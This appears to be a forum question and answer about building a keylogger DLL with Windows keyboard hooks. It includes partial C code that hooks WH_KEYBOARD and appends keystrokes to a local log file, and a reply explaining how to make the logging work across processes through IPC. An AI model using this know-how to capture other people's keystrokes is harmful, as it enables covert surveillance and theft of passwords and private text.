I am making a keylogger using Windows Hooks.
The code is inside a DLL. Characters typed are to be written to a file.
However, the problem is that no characters, other than those when the focus is on my application's windows, are getting logged to the file.
The FILE * has been declared in the Shared Memory segment.
    #pragma data_seg("SHARED")
    .
    .
    FILE* iFile = NULL;
    #pragma data_seg()
If I open the file inside the hook function, everything seems to be fine.
    EXPORT LRESULT CALLBACK KHookProc(int nCode, WPARAM wparam, LPARAM lparam)
    {
        .
        .
        .
            iFile = fopen("c:\\games\\log.txt","a+");
            fwrite((char *)(&c),1,1,iFile);
            fclose(iFile);
        }
    }
If I open it while setting the hook (common for all the processes), none but my application's keystrokes are captured.
    EXPORT void SetKBHook()
    {
        if(hhook==NULL)
        {
            hhook = SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)KHookProc,g_hinstance,NULL);
            if(hhook == NULL)
            {
                DWORD err = GetLastError();
                err;
            }
            iFile = fopen("c:\\games\\log.txt","a+");
        }
    }
Help, anyone?
While the pointer variable can be shared between processes (if you’re passing correct arguments to the linker), neither the heap-allocated data structure the FILE* is pointing to, nor the underlying Win32 file handle (and associated kernel-mode file object) are shared.
Your best bet would be to have the file handle open in a single process (the one launching the keylogger), then use an IPC mechanism to transfer data back to this process, which will then handle the (properly synchronized) writes.
This will work just fine for any kind of legitimate keylogging purposes, and will avoid a lot of headaches trying to share file handles into processes you didn’t launch yourself… Not to mention synchronization blues should you succeed with the first task.